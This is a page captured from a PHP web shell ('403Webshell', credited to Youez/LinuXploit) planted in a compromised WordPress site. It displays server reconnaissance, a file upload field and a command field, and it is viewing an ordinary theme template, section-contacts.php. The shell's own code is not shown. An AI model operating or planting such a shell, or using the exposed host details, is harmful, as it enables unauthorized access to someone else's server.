403Webshell
Server IP : 172.67.71.254  /  Your IP : 216.73.216.4
Web Server : nginx/1.27.1
System : Linux in-5 5.15.0-143-generic #153-Ubuntu SMP Fri Jun 13 19:10:45 UTC 2025 x86_64
User : arabianexpress ( 1872)
PHP Version : 8.0.30
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /storage/v9321/buzzbitesv3/public_html/wp-content/themes/bite/front-page/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /storage/v9321/buzzbitesv3/public_html/wp-content/themes/bite/front-page/section-contacts.php
<div class="front_page_section front_page_section_contacts<?php
	$bite_scheme = bite_get_theme_option( 'front_page_contacts_scheme' );
	if ( ! empty( $bite_scheme ) && ! bite_is_inherit( $bite_scheme ) ) {
		echo ' scheme_' . esc_attr( $bite_scheme );
	}
	echo ' front_page_section_paddings_' . esc_attr( bite_get_theme_option( 'front_page_contacts_paddings' ) );
	if ( bite_get_theme_option( 'front_page_contacts_stack' ) ) {
		echo ' sc_stack_section_on';
	}
?>"
		<?php
		$bite_css      = '';
		$bite_bg_image = bite_get_theme_option( 'front_page_contacts_bg_image' );
		if ( ! empty( $bite_bg_image ) ) {
			$bite_css .= 'background-image: url(' . esc_url( bite_get_attachment_url( $bite_bg_image ) ) . ');';
		}
		if ( ! empty( $bite_css ) ) {
			echo ' style="' . esc_attr( $bite_css ) . '"';
		}
		?>
>
<?php
	// Add anchor
	$bite_anchor_icon = bite_get_theme_option( 'front_page_contacts_anchor_icon' );
	$bite_anchor_text = bite_get_theme_option( 'front_page_contacts_anchor_text' );
if ( ( ! empty( $bite_anchor_icon ) || ! empty( $bite_anchor_text ) ) && shortcode_exists( 'trx_sc_anchor' ) ) {
	echo do_shortcode(
		'[trx_sc_anchor id="front_page_section_contacts"'
									. ( ! empty( $bite_anchor_icon ) ? ' icon="' . esc_attr( $bite_anchor_icon ) . '"' : '' )
									. ( ! empty( $bite_anchor_text ) ? ' title="' . esc_attr( $bite_anchor_text ) . '"' : '' )
									. ']'
	);
}
?>
	<div class="front_page_section_inner front_page_section_contacts_inner
	<?php
	if ( bite_get_theme_option( 'front_page_contacts_fullheight' ) ) {
		echo ' bite-full-height sc_layouts_flex sc_layouts_columns_middle';
	}
	?>
			"
			<?php
			$bite_css      = '';
			$bite_bg_mask  = bite_get_theme_option( 'front_page_contacts_bg_mask' );
			$bite_bg_color_type = bite_get_theme_option( 'front_page_contacts_bg_color_type' );
			if ( 'custom' == $bite_bg_color_type ) {
				$bite_bg_color = bite_get_theme_option( 'front_page_contacts_bg_color' );
			} elseif ( 'scheme_bg_color' == $bite_bg_color_type ) {
				$bite_bg_color = bite_get_scheme_color( 'bg_color', $bite_scheme );
			} else {
				$bite_bg_color = '';
			}
			if ( ! empty( $bite_bg_color ) && $bite_bg_mask > 0 ) {
				$bite_css .= 'background-color: ' . esc_attr(
					1 == $bite_bg_mask ? $bite_bg_color : bite_hex2rgba( $bite_bg_color, $bite_bg_mask )
				) . ';';
			}
			if ( ! empty( $bite_css ) ) {
				echo ' style="' . esc_attr( $bite_css ) . '"';
			}
			?>
	>
		<div class="front_page_section_content_wrap front_page_section_contacts_content_wrap content_wrap">
			<?php

			// Title and description
			$bite_caption     = bite_get_theme_option( 'front_page_contacts_caption' );
			$bite_description = bite_get_theme_option( 'front_page_contacts_description' );
			if ( ! empty( $bite_caption ) || ! empty( $bite_description ) || ( current_user_can( 'edit_theme_options' ) && is_customize_preview() ) ) {
				// Caption
				if ( ! empty( $bite_caption ) || ( current_user_can( 'edit_theme_options' ) && is_customize_preview() ) ) {
					?>
					<h2 class="front_page_section_caption front_page_section_contacts_caption front_page_block_<?php echo ! empty( $bite_caption ) ? 'filled' : 'empty'; ?>">
					<?php
						echo wp_kses( $bite_caption, 'bite_kses_content' );
					?>
					</h2>
					<?php
				}

				// Description
				if ( ! empty( $bite_description ) || ( current_user_can( 'edit_theme_options' ) && is_customize_preview() ) ) {
					?>
					<div class="front_page_section_description front_page_section_contacts_description front_page_block_<?php echo ! empty( $bite_description ) ? 'filled' : 'empty'; ?>">
					<?php
						echo wp_kses( wpautop( $bite_description ), 'bite_kses_content' );
					?>
					</div>
					<?php
				}
			}

			// Content (text)
			$bite_content = bite_get_theme_option( 'front_page_contacts_content' );
			$bite_layout  = bite_get_theme_option( 'front_page_contacts_layout' );
			if ( 'columns' == $bite_layout && ( ! empty( $bite_content ) || ( current_user_can( 'edit_theme_options' ) && is_customize_preview() ) ) ) {
				?>
				<div class="front_page_section_columns front_page_section_contacts_columns columns_wrap">
					<div class="column-1_3">
				<?php
			}

			if ( ( ! empty( $bite_content ) || ( current_user_can( 'edit_theme_options' ) && is_customize_preview() ) ) ) {
				?>
				<div class="front_page_section_content front_page_section_contacts_content front_page_block_<?php echo ! empty( $bite_content ) ? 'filled' : 'empty'; ?>">
					<?php
					echo wp_kses( $bite_content, 'bite_kses_content' );
					?>
				</div>
				<?php
			}

			if ( 'columns' == $bite_layout && ( ! empty( $bite_content ) || ( current_user_can( 'edit_theme_options' ) && is_customize_preview() ) ) ) {
				?>
				</div><div class="column-2_3">
				<?php
			}

			// Shortcode output
			$bite_sc = bite_get_theme_option( 'front_page_contacts_shortcode' );
			if ( ! empty( $bite_sc ) || ( current_user_can( 'edit_theme_options' ) && is_customize_preview() ) ) {
				?>
				<div class="front_page_section_output front_page_section_contacts_output front_page_block_<?php echo ! empty( $bite_sc ) ? 'filled' : 'empty'; ?>">
					<?php
					bite_show_layout( do_shortcode( $bite_sc ) );
					?>
				</div>
				<?php
			}

			if ( 'columns' == $bite_layout && ( ! empty( $bite_content ) || ( current_user_can( 'edit_theme_options' ) && is_customize_preview() ) ) ) {
				?>
				</div></div>
				<?php
			}
			?>

		</div>
	</div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit